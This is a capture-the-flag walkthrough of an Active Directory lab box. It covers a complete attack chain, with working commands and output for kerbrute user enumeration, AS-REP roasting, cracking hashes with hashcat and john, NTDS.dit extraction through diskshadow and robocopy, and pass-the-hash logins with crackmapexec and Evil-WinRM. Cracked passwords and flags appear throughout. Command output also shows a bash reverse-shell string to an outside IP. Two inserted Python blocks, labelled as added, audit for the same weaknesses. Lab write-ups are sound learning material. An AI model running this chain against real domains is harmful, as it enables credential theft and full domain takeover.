This room was really fun. I had to do a lot of reading and digging, so I got to learn a lot about Active Directory in the process.
```
PORT     STATE SERVICE           VERSION
53/tcp   open  domain            Simple DNS Plus
88/tcp   open  kerberos-sec      Microsoft Windows Kerberos (server time: 2022-08-29 18:49:40Z)
111/tcp  open  rpcbind           2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp  open  msrpc             Microsoft Windows RPC
139/tcp  open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: raz0rblack.thm, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
2049/tcp open  mountd            1-3 (RPC #100005)
3268/tcp open  ldap              Microsoft Windows Active Directory LDAP (Domain: raz0rblack.thm, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server     Microsoft Terminal Services
|_ssl-date: 2022-08-29T18:50:36+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=HAVEN-DC.raz0rblack.thm
| Not valid before: 2022-08-28T18:48:06
|_Not valid after:  2023-02-27T18:48:06
| rdp-ntlm-info:
|   Target_Name: RAZ0RBLACK
|   NetBIOS_Domain_Name: RAZ0RBLACK
|   NetBIOS_Computer_Name: HAVEN-DC
|   DNS_Domain_Name: raz0rblack.thm
|   DNS_Computer_Name: HAVEN-DC.raz0rblack.thm
|   Product_Version: 10.0.17763
|_  System_Time: 2022-08-29T18:50:27+00:00
Service Info: Host: HAVEN-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2022-08-29T18:50:29
|_  start_date: N/A
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
```
Initial nmap results. Lots to go at. We can see the DNS name, so the first thing to do is add it to /etc/hosts.
We’ll start with the open NFS share and see what’s there.
```
showmount -e raz0rblack.thm
Export list for raz0rblack.thm:
/users (everyone)

sudo mount -t nfs 10.10.53.219:/users /mnt/users
sudo ls -la /mnt/users
total 17
drwx------ 2 nobody nogroup   64 Feb 27  2021 .
drwxr-xr-x 3 root   root    4096 Aug 29 20:30 ..
-rwx------ 1 nobody nogroup 9861 Feb 25  2021 employee_status.xlsx
-rwx------ 1 nobody nogroup   80 Feb 25  2021 sbradley.txt
```
Interestingly, you can’t cd into the folder (permission denied), but you can sudo cp the files out to access them.
sbradley.txt contains another flag, and employee_status.xlsx contains a list of usernames we can enumerate.
| Name | Role |
|---|---|
| daven port | TF PLAYER |
| imogen royce | CTF PLAYER |
| tamara vidal | CTF PLAYER |
| arthur edwards | CTF PLAYER |
| carl ingram | TF PLAYER (INACTIVE) |
| nolan cassidy | CTF PLAYER |
| reza zaydan | TF PLAYER |
| ljudmila vetrova | CTF PLAYER, DEVELOPER, ACTIVE DIRECTORY ADMIN |
| rico delgado | WEB SPECIALIST |
| tyson williams | REVERSE ENGINEERING |
| steven bradley | STEGO SPECIALIST |
| chamber lin | TF PLAYER (INACTIVE) |
I’m sure their roles aren’t so useful, but their names are. I can use a script from the CTF-Bash-Tools collection to generate a list of candidate usernames from them and run it through kerbrute against the box.
```
./kerbrute_linux_amd64 userenum -d raz0rblack.thm --dc 10.10.53.219 ~/Desktop/thm/raz0r/formatted_name_wordlist.txt
```
Kerbrute gives us 3 valid usernames.
```
Version: v1.0.3 (9dad6e1) - 08/29/22 - Ronnie Flathers @ropnop

2022/08/29 21:24:01 >  Using KDC(s):
2022/08/29 21:24:01 >   10.10.95.102:88

2022/08/29 21:24:02 >  [+] VALID USERNAME:  lvetrova@raz0rblack.thm
2022/08/29 21:24:02 >  [+] VALID USERNAME:  twilliams@raz0rblack.thm
2022/08/29 21:24:02 >  [+] VALID USERNAME:  sbradley@raz0rblack.thm
2022/08/29 21:24:02 >  Done! Tested 154 usernames (3 valid) in 1.060 seconds
```
I spent some time attempting to spray passwords with little luck, so I returned to the impacket suite to see what’s on offer.
We find that GetNPUsers is able to dump AS-REP hashes for accounts whose Kerberos pre-authentication has been (mis)configured as not required.
```
python3 /opt/impacket/examples/GetNPUsers.py raz0rblack.thm/ -dc-ip 10.10.94.211 -usersfile users -format hashcat -outputfile ~/Desktop/thm/raz0r/hashes.txt
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[-] User sbradley doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lvetrova doesn't have UF_DONT_REQUIRE_PREAUTH set
```
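The UF_DONT_REQUIRE_PREAUTH flag GetNPUsers reports on is a bit in each account's userAccountControl attribute, which makes it easy to audit from the defender's side. This added example (my code, not from the writeup or from impacket) walks constructed LDAP-style records and lists enabled accounts with pre-authentication disabled; it also lists user accounts carrying a servicePrincipalName, the condition behind the UserSPNs dump used later in the writeup. The record contents and the SPN value are assumptions, not data from the box.

```python
# Added example, not from the writeup: audit user records for the two conditions that
# expose Kerberos material to offline cracking. Pre-authentication disabled (the
# UF_DONT_REQUIRE_PREAUTH flag GetNPUsers.py reports on) exposes an AS-REP; a
# servicePrincipalName on a user account exposes a service ticket (what GetUserSPNs dumps).
UF_ACCOUNTDISABLE = 0x0002           # userAccountControl bits as documented for AD
UF_DONT_REQUIRE_PREAUTH = 0x400000

def roastable_accounts(records):
    """Return (asrep, kerberoast) lists of sAMAccountNames from LDAP-style dicts."""
    asrep, kerberoast = [], []
    for rec in records:
        uac = int(rec.get("userAccountControl", 0))
        if uac & UF_ACCOUNTDISABLE:
            continue                 # a disabled account cannot be used to request tickets
        name = rec["sAMAccountName"]
        if uac & UF_DONT_REQUIRE_PREAUTH:
            asrep.append(name)
        # krbtgt always carries an SPN and is covered by its own rotation policy
        if rec.get("servicePrincipalName") and name.lower() != "krbtgt":
            kerberoast.append(name)
    return asrep, kerberoast

# Constructed sample records (not real data from the box); 0x200 is NORMAL_ACCOUNT.
SAMPLE_RECORDS = [
    {"sAMAccountName": "twilliams", "userAccountControl": 0x400200, "servicePrincipalName": []},
    {"sAMAccountName": "sbradley",  "userAccountControl": 0x200,    "servicePrincipalName": []},
    {"sAMAccountName": "xyan1d3",   "userAccountControl": 0x200,
     "servicePrincipalName": ["HTTP/haven-dc.raz0rblack.thm"]},   # hypothetical SPN
    {"sAMAccountName": "olduser",   "userAccountControl": 0x400202, "servicePrincipalName": []},
    {"sAMAccountName": "krbtgt",    "userAccountControl": 0x202,
     "servicePrincipalName": ["kadmin/changepw"]},
]

def audit_sample():
    return roastable_accounts(SAMPLE_RECORDS)

if __name__ == "__main__":
    asrep, kerberoast = audit_sample()
    print("pre-auth disabled:", asrep)             # ['twilliams']
    print("user accounts with SPNs:", kerberoast)  # ['xyan1d3']
```

Note that olduser has the flag set but is disabled, so it is not reported; a real audit would pull the same three attributes for every user with an LDAP query and feed them in.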
We’ll try cracking it with hashcat.
```
hashcat -m 18200 hashes.txt /usr/share/wordlists/rockyou.txt --force --show
$krb5asrep$23$twilliams@RAZ0RBLACK.THM:705d994b0e5a73e9d0367e3b425378ca$2382130e93e756f8420af94546d07293194cac4d75661c0a19caf47a817d4f99774a63abf9e4697d850a2936ae50c1eaf7e645caabb17140ce0689818c83e8ee0cde44d93284614283de03efc360455a79376c155864fa1c4acb4a702458067baf95cde656dcf894e9ae3a0ebf18ea0dbc40ad0f4312f4d4a652e0f054ee953c019d008a280d78ffa41d0b99b321d3e4dc033f902ee262f3bd8e54d8ff587b3fe5b58d79661e922d6d63b4ed893c4770a7c041b25caf9dd0fc6acac2e3e9b7c95391764be4eb02b3e51a15788f87a9ed9943797078fd1b80fd03f1c4af9fef31817c0c04a7c62cb79765950c2da8b149:roastpotatoes
```
Since this was at the top of the rockyou.txt list, I thought I’d try it against the other users in the list. Interestingly, instead of a failed login message we get STATUS_PASSWORD_MUST_CHANGE for the user sbradley.
```
raz0rblack.thm\sbradley:roastpotatoes STATUS_PASSWORD_MUST_CHANGE

smbpasswd -r 10.10.56.82 -U sbradley
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user sbradley
```
We set the new password to Password! because that’s super secure.
This user has read access to a folder called trash in the SMB share, so let’s grab all the files and have a look.
```
smb: \> ls
  .                                   D        0  Tue Mar 16 06:01:28 2021
  ..                                  D        0  Tue Mar 16 06:01:28 2021
  chat_log_20210222143423.txt         A     1340  Thu Feb 25 19:29:05 2021
  experiment_gone_wrong.zip           A 18927164  Tue Mar 16 06:02:20 2021
  sbradley.txt                        A       37  Sat Feb 27 19:24:21 2021

                5101823 blocks of size 4096. 1003387 blocks available
smb: \> mget *
```
The zip file will contain the answer to one of the questions, so we use zip2john to dump its hash to a file and crack it.
```
john zip.hash -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
electromagnetismo (experiment_gone_wrong.zip)
1g 0:00:00:01 DONE (2022-08-31 21:08) 0.9345g/s 7832Kp/s 7832Kc/s 7832KC/s elieus..elboty2009
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```
Opening the zip file gives us a system.hive and an NTDS.dit, from which we can dump a huge file of hashes. We have credentials for 2 of the 3 verified usernames, so we can try all of the hashes against the user lvetrova using crackmapexec again. We can use awk to split each line on colons and keep the 4th field (the NTLM hash), writing it to a new file for CME.
```
awk -F : '{print $4}' ntds.txt > ntdshashes.txt
```
```
crackmapexec smb 10.10.84.55 -u lvetrova -H ntdshashes.txt
SMB  10.10.84.55  445  HAVEN-DC  [*] Windows 10.0 Build 17763 x64 (name:HAVEN-DC) (domain:raz0rblack.thm) (signing:True) (SMBv1:False)
SMB  10.10.84.55  445  HAVEN-DC  [-] raz0rblack.thm\lvetrova:1afedc472d0fdfe07cd075d36804efd0 STATUS_LOGON_FAILURE
SMB  10.10.84.55  445  HAVEN-DC  [-] raz0rblack.thm\lvetrova:7b8b14a73d8a45249de2f5b0c225d515 STATUS_LOGON_FAILURE
SMB  10.10.84.55  445  HAVEN-DC  [-] raz0rblack.thm\lvetrova:081af9630677a387f6f0a9bb17852602 STATUS_LOGON_FAILURE
SMB  10.10.84.55  445  HAVEN-DC  [-] raz0rblack.thm\lvetrova:c184a72ed800899bc1ff633778a89b5e STATUS_LOGON_FAILURE
SMB  10.10.84.55  445  HAVEN-DC  [+] raz0rblack.thm\lvetrova:f220d3988deb3f516c73f40ee16c431d
```
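What made this work is that a hash from an old copy of the database still matched a live account, i.e. a password that was never rotated. Defenders who obtain such a dump from their own DC can check for that kind of hygiene problem directly. This added example (my code, not from the writeup or from impacket) parses the same domain\user:rid:lmhash:nthash::: line format the awk above splits, and reports empty passwords, accounts still storing an LM hash, and NT hashes shared between accounts; the dump lines are constructed and the non-empty hash values are made up.

```python
# Added example, not from the writeup: audit a secretsdump-style NTDS dump for credential
# hygiene. Lines look like domain\user:rid:lmhash:nthash::: (the 4th field is the one the
# writeup's awk selects).
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of an empty password
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of an empty password

def parse_ntds_line(line):
    """Return (user, rid, lm, nt) for a dump line, or None if it is not one."""
    parts = line.strip().split(":")
    if len(parts) < 4 or not parts[1].isdigit() or len(parts[3]) != 32:
        return None
    return parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()

def audit_ntds(lines):
    """Flag empty passwords, LM hashes still stored, and NT-hash reuse across users."""
    empty, lm_stored, by_nt = [], [], defaultdict(list)
    for line in lines:
        parsed = parse_ntds_line(line)
        if parsed is None or parsed[0].endswith("$"):
            continue                      # skip non-hash lines and machine accounts
        user, _rid, lm, nt = parsed
        if nt == EMPTY_NT:
            empty.append(user)
        if lm != EMPTY_LM:
            lm_stored.append(user)        # LM storage should be off on a modern domain
        by_nt[nt].append(user)
    reused = {nt: users for nt, users in by_nt.items() if len(users) > 1}
    return {"empty": empty, "lm_stored": lm_stored, "reused": reused}

# Constructed sample dump; the non-empty hashes below are made-up values, not from the box.
SAMPLE_DUMP = """\
raz0rblack.thm\\Administrator:500:aad3b435b51404eeaad3b435b51404ee:a1b2c3d4e5f60718293a4b5c6d7e8f90:::
raz0rblack.thm\\Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
raz0rblack.thm\\lvetrova:1105:aad3b435b51404eeaad3b435b51404ee:0f1e2d3c4b5a69788796a5b4c3d2e1f0:::
raz0rblack.thm\\sbradley:1104:0123456789abcdef0123456789abcdef:0f1e2d3c4b5a69788796a5b4c3d2e1f0:::
HAVEN-DC$:1000:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
not a hash line
"""

def audit_sample():
    return audit_ntds(SAMPLE_DUMP.splitlines())

if __name__ == "__main__":
    for finding, value in audit_sample().items():
        print(finding, value)
```

Comparing the "reused" output of an old dump against a fresh one is the same check the writeup performs with crackmapexec, done offline and without touching the DC.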
This user also has RDP access, and crackmapexec tells us we can Evil-WinRM to the box.

The file lvetrova.xml tells us “Your Flag Is Here” but no flag. After a lot of googling I came across some posts explaining how PowerShell can store secrets in XML files (the Export-Clixml format), which can be read back with the following.
```powershell
# First import the file as a variable to use.
$ss = Import-Clixml -Path lvetrova.xml
# Then output the credential in a formatted form.
$ss.GetNetworkCredential() | Format-List
# Which gives us the following...
UserName       : Your Flag is here =>
Password       : THM{694362e877adef0d85a92e6d17551fe4}
SecurePassword : System.Security.SecureString
Domain         :
```
While crackmapexec was validating the hashes, we were able to dump user SPN tickets with an impacket script (GetUserSPNs). With hashcat we get the username xyan1d3 and password cyanide9amine5628, which according to crackmapexec we can Evil-WinRM with too. The next question pertains to this user, so let’s see where their flag is hidden.
This user has a similar XML file, which we can do exactly the same thing to obtain the flag.
Since we’re on an AD box, I’ll run Bloodhound and see if there are any obvious misconfigurations we can use to move laterally.

We can see that xyan1d3 is a member of Backup Operators, which we can confirm in our Evil-WinRM shell.
```
*Evil-WinRM* PS C:\Users\xyan1d3\Documents> get-adgroupmember -identity "backup operators"

distinguishedName : CN=bash -i >&. /dev/tcp/10.8.156.189/8888 0>&1,CN=Users,DC=raz0rblack,DC=thm
name              : bash -i >&. /dev/tcp/10.8.156.189/8888 0>&1
objectClass       : user
objectGUID        : 89642a3b-44d6-47a8-abea-4b9135e45994
SamAccountName    : xyan1d3
SID               : S-1-5-21-3403444377-2687699443-13012745-1106
```
xyan1d3 doesn’t have access to the files in Administrator’s home folder, but apparently we can use the privileges of a Backup Operator to obtain ntds.dit and dump hashes. Because this is a live domain controller, ntds.dit is in use and we cannot read it directly. We can use diskshadow to take a shadow copy of the live volume and access ntds.dit from there.
To do this, firstly create a script for diskshadow to run.
```
set verbose onX
set metadata C:\Windows\Temp\meta.cabX
set context clientaccessibleX
set context persistentX
begin backupX
add volume C: alias cdriveX
createX
expose %cdrive% E:X
end backupX
```
Then pass the file to diskshadow.
```
diskshadow /s backup.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  HAVEN-DC,  9/1/2022 2:04:45 AM

-> set verbose on
-> set metadata C:\Windows\Temp\meta.cab
-> set context clientaccessible
-> set context persistent
-> begin backup
-> add volume C: alias cdrive
-> create
Excluding writer "Shadow Copy Optimization Writer", because all of its components have been excluded.
Component "\BCD\BCD" from writer "ASR Writer" is excluded from backup, because it requires volume which is not in the shadow copy set.
...
```
Using robocopy in backup mode (/b), we can copy ntds.dit out of the shadow copy.
```
C:\files> robocopy /b E:\Windows\ntds . ntds.dit

-------------------------------------------------------------------------------
   ROBOCOPY     ::     Robust File Copy for Windows
-------------------------------------------------------------------------------

  Started : Thursday, September 1, 2022 2:10:28 AM
   Source : E:\Windows\ntds\
     Dest : C:\files\

    Files : ntds.dit

  Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30

------------------------------------------------------------------------------

                           1    E:\Windows\ntds\
            New File              16.0 m        ntds.dit
```
Copying these to our Kali box with smbserver and dumping them with secretsdump gives us another hash file, this time with a more reasonable and up-to-date list of users. With Evil-WinRM we can pass the Administrator hash and log in as Administrator.

The root.xml file doesn’t import the same way the others did and gives us a cryptographic error. After diving down another rabbit hole, I realised on inspecting the xml file that its content was just hex encoded, so we can quickly retrieve the flag…
```
Look this is your cookie.
FunFact : This cookie can change its own flavour automatically.
To test it just think of your favourite flavour.
And stop putting 'OR '1'='1 inside login.php
Enjoy your Cookie
```
Inside cookie.json there’s the base64-encoded text above; after a bunch more digging we find the folder “Top Secret” inside “C:\Program Files” containing the following PNG.

This gives us the answer to the last question: the way to save and exit vim, :wq.